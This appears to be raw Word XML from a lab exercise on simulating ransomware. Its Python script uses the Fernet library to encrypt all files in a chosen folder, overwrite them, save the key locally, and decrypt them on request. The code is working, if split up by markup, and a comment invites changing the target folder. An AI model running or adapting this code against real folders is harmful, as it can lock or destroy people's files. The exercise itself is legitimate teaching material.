g8ifzsUEyEmnsz0GDSjR6Zg4YKWifKYYKsvXPJ5GxAhikJ+oAOnIY&#10;II+9yXyPF50AItRmRh+9h2T0lsZhXMaxp/Plkn29P4c1nwL1ubJmWOyRyg0b2rIzG7JmdhZr4Mgb&#10;xtxqupEQGbNXnf25P9HrkEF+OWtaS4A4xpAjzIF2UhHcG6Opp8ljCSIhcLQ55s/mU78BJa7j2BLI&#10;qD5D9IDyAYn2qq9plU6GQAXKnwYvyh8qXfr+fq5Br3A03tmSB6weCLcmnCX832SUax1Wj0CHHh+O&#10;ZRRARL+R1a3XRXV4MoWCDKWnyypdHfbHC+j9X7sQGyuO5JN9dpxOJugK0gHHvUwynvs6PR/tY9vy&#10;779ctK95kEZU14cNPcztbsdqTXsd7LUWn8scKAF95txeVotvg7Hm3CHaXNvX7hmwrb6GqK/dvl6L&#10;zbmUWQwps7iUMhN9Z0eZtmt87Ye+1pBTz32qyfIC00ViQj9WcADn+4JYa3C0aw5uhms42jI/bNRa&#10;jT+UtP04S7hv56CKHW6Gjz5Iq6hfe2H7ndT/qKLrV7zw0lu/nWte0Ku36va1fofV/Y1w/w8AAAD/&#10;/wMAUEsDBBQABgAIAAAAIQAVDFs44AAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BasMwEETv&#10;hf6D2EBvjaTUMcWxHEJoewqFJoXSm2JtbBNrZSzFdv6+yqk5DjPMvMnXk23ZgL1vHCmQcwEMqXSm&#10;oUrB9+H9+RWYD5qMbh2hgit6WBePD7nOjBvpC4d9qFgsIZ9pBXUIXca5L2u02s9dhxS9k+utDlH2&#10;FTe9HmO5bflCiJRb3VBcqHWH2xrL8/5iFXyMety8yLdhdz5tr7+H5efPTqJST7NpswIWcAr/Ybjh&#10;R3QoItPRXch41kadJPFLUJCkKbBbQMp0AeyoYCkE8CLn9xeKPwAAAP//AwBQSwECLQAUAAYACAAA&#10;ACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIt&#10;ABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQIt&#10;ABQABgAIAAAAIQByQMs6VwQAAI4YAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItABQABgAIAAAAIQAVDFs44AAAAAoBAAAPAAAAAAAAAAAAAAAAALEGAABkcnMvZG93bnJldi54&#10;bWxQSwUGAAAAAAQABADzAAAAvgcAAAAA&#10;">
                <v:shape id="Graphic 144" o:spid="_x0000_s1027" style="position:absolute;width:61722;height:203;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6172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S7wQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlCr3ppjZISV1FFKFXrYf2NsmOSTQ7G7NTE/+9Wyj0No/3OYvV4Bp1oy7Ung28TBNQxIW3&#10;NZcGjp+7yRuoIMgWG89k4E4BVsvxaIGZ9T3v6XaQUsUQDhkaqETaTOtQVOQwTH1LHLmT7xxKhF2p&#10;bYd9DHeNniXJXDusOTZU2NKmouJy+HEG8vRLWM7D937bN9trucuvr7PcmOenYf0OSmiQf/Gf+8PG&#10;+WkKv8/EC/TyAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAopJLvBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m6172200,l,,,20307r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 145" o:spid="_x0000_s1028" style="position:absolute;left:61704;top:1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HSwwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LSwMx&#10;EL4L/ocwgjebtajUtdlFWwq91OLa3ofNmF3cTJYk++i/N4LgbT6+56zL2XZiJB9axwruFxkI4trp&#10;lo2C0+fubgUiRGSNnWNScKEAZXF9tcZcu4k/aKyiESmEQ44Kmhj7XMpQN2QxLFxPnLgv5y3GBL2R&#10;2uOUwm0nl1n2JC22nBoa7GnTUP1dDVaBPKye3y7HzdCb6vC+9cN0Po5Gqdub+fUFRKQ5/ov/3Hud&#10;5j88wu8z6QJZ/AAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBOXHSwwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 146" o:spid="_x0000_s1029" style="position:absolute;left:3;top:14;width:61734;height:172;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6173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OAwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hBG81qxVtV6NooVAPbdGWBW/DZtwsbiZLEnX996ZQ6G0e73MWq8424kI+1I4VjIYZCOLS&#10;6ZorBT/fb4/PIEJE1tg4JgU3CrBa9h4WmGt35R1d9rESKYRDjgpMjG0uZSgNWQxD1xIn7ui8xZig&#10;r6T2eE3htpHjLJtKizWnBoMtvRoqT/uzVVB4b9Zfnx8b2j61h3qWFS+bUCg16HfrOYhIXfwX/7nf&#10;dZo/mcLvM+kCubwDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEACPwDgMMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3048,3035l,3035,,16751r3048,l3048,3035xem6173152,r-3035,l6170117,3035r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 147" o:spid="_x0000_s1030" style="position:absolute;left:61704;top:45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WwwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4f7H8IN/BlzFSROTqjDEXwoRRmZc9Hc2uKzaUkUet/bwTBt/v4ft5iNdhOnMmH1rGCyTgDQVw7&#10;3XKj4FBtP75AhIissXNMCq4UYLV8fVlgrt2Ff+m8j41IIRxyVGBi7HMpQ23IYhi7njhx/85bjAn6&#10;RmqPlxRuOznNsk9pseXUYLCntaH6uD9ZBe9cFqVpq6PdVH9V5otQdrJQavQ2/HyDiDTEp/jh3uk0&#10;fzaH+zPpArm8AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOMlFbDBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m3047,l,,,13716r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 14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NIuxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bb8Iw&#10;DIXvk/gPkZG4jZQJJlQICCYhoe20bhdupjFtoXGqJNDu38+HSbvZes/vfV5vB9eqB4XYeDYwm2ag&#10;iEtvG64MfH8dnpegYkK22HomAz8UYbsZPa0xt77nT3oUqVISwjFHA3VKXa51LGtyGKe+Ixbt4oPD&#10;JGuotA3YS7hr9UuWvWqHDUtDjR291VTeirszQL7EIuvfP87+eridrsUi7O3CmMl42K1AJRrSv/nv&#10;+mgFfy608oxMoDe/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAE3U0i7EAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 149" o:spid="_x0000_s1032" style="position:absolute;left:3;top:182;width:61734;height:32;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6173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iZxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;EIXvwv6HMAteRNMV0bVrlEURBC/qKu5xaMa22ExCE7X+eyMI3mZ4733zZjJrTCWuVPvSsoKvXgKC&#10;OLO65FzB/m/Z/QbhA7LGyjIpuJOH2fSjNcFU2xtv6boLuYgQ9ikqKEJwqZQ+K8ig71lHHLWTrQ2G&#10;uNa51DXeItxUsp8kQ2mw5HihQEfzgrLz7mIiZejmpekf3GW/GWyO9+W6s/gfKdX+bH5/QARqwtv8&#10;Sq90rD8Yw/OZOIGcPgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAHz1iZxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m6170028,l3048,,,,,3035r3048,l6170028,3035r,-3035xem6173152,r-3035,l6170117,3035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C050C3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri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E7314A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481"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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encrypting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folder and then decrypting them with a key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385AC5AA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5DE62C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="783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 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simulates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ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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encrypting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folder and then decrypting them using a key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653F089" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3FADB5" w14:textId="77777777" w:rsidR="00A16F47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4EF7CED9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4"/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3.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7295C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cryptography</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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(for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decryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A6FA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(VSCode,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PyCharm,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0BEB6E6F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"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="20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terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F85457" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC87A68" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Experiment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3C0C915E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493195B8" w14:textId="77777777" w:rsidR="00A16F47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Ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49942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4"/>
        <w:ind w:left="1080" w:right="777"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ransomware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malware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encrypts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victim‟s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demands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decryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C47920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ind w:left="1080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simulation will </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076790E1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800"/>
        </w:tabs>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Encrypting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2B2DA975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800"/>
        </w:tabs>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Storing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the 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securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CABD4E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800"/>
        </w:tabs>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Decrypting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when provided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correct </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD1DF9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="23"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D039B9F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="230" w:lineRule="auto"/>
        <w:ind w:left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Libraries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cryptography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library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decryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75E526" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="20"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE4BA19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cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C41C03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6E736B24" w14:textId="77777777" w:rsidR="00A16F47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the Python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Ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE22BED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBC1A02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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3EA2AF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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cryptography.fernet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Fernet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3D30A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F3FAB5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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generate_key():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E59D97" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing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Fernet.generate_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DB674C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1320" w:right="2222" w:hanging="48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open("encryption_key.key",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"wb")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key_file: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>key_file.write(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3016A65A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF89911" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F15213B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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load_key():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8983E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open("encryption_key.key",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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"rb").read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E56B1F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="84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encrypt_files(folder_path,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key): cipher = Fernet(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4B73FB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file_name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os.listdir(folder_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD375A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1320" w:right="3178"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>file_path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os.path.join(folder_path,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file_name) if os.path.isfile(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31695D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2280" w:right="3449" w:hanging="48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"rb")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file: file_data = file.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3DD64" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>encrypted_data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cipher.encrypt(file_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A711F8A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"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D3E5A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="2280" w:right="2222" w:hanging="60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"wb")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file: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>file.write(encrypted_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1DD617" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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print("All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files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have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encrypted.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB0074" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3D42A7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="5229" w:hanging="48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decrypt_files(folder_path,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key): cipher = Fernet(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F32B259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file_name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os.listdir(folder_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F0C438" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1320" w:right="3178"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>file_path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os.path.join(folder_path,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file_name) if os.path.isfile(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA4618D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2280" w:right="3449" w:hanging="480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"rb")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file: encrypted_data = file.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F2375" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1800" w:right="2701"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>decrypted_data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cipher.decrypt(encrypted_data) with open(file_path, "wb") as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F40130C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="4861" w:firstLine="143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file.write(decrypted_data) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("All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files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have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decrypted.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5827A181" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226" w:line="226" w:lineRule="exact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pacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036BAC4E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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folder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"test_folder"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Change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your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target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folder os.makedirs(folder, exist_ok=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BDE907" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="29" w:line="454" w:lineRule="exact"/>
        <w:ind w:left="840" w:right="1498"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>option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'E'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'D'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decrypt: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").upper() if option == 'E':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A19055" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="196" w:lineRule="exact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generate_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152AB7BE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="5720" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>encrypt_files(folder,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key) elif option == 'D':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7A39B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1320" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>key = load_key() decrypt_files(folder,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key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC31E6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="84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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A030E0E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact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print("Invalid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option.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'E'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'D'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decrypt.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F368E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1CCF03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223E6F5F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50435BB7" w14:textId="77777777" w:rsidR="00A16F47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line="284" w:lineRule="exact"/>
        <w:ind w:left="107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rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ransomware_simulator.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43224AE8" w14:textId="77777777" w:rsidR="00A16F47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line="278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test_folder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15A06E71" w14:textId="77777777" w:rsidR="00A16F47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line="271" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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terminal,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script's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
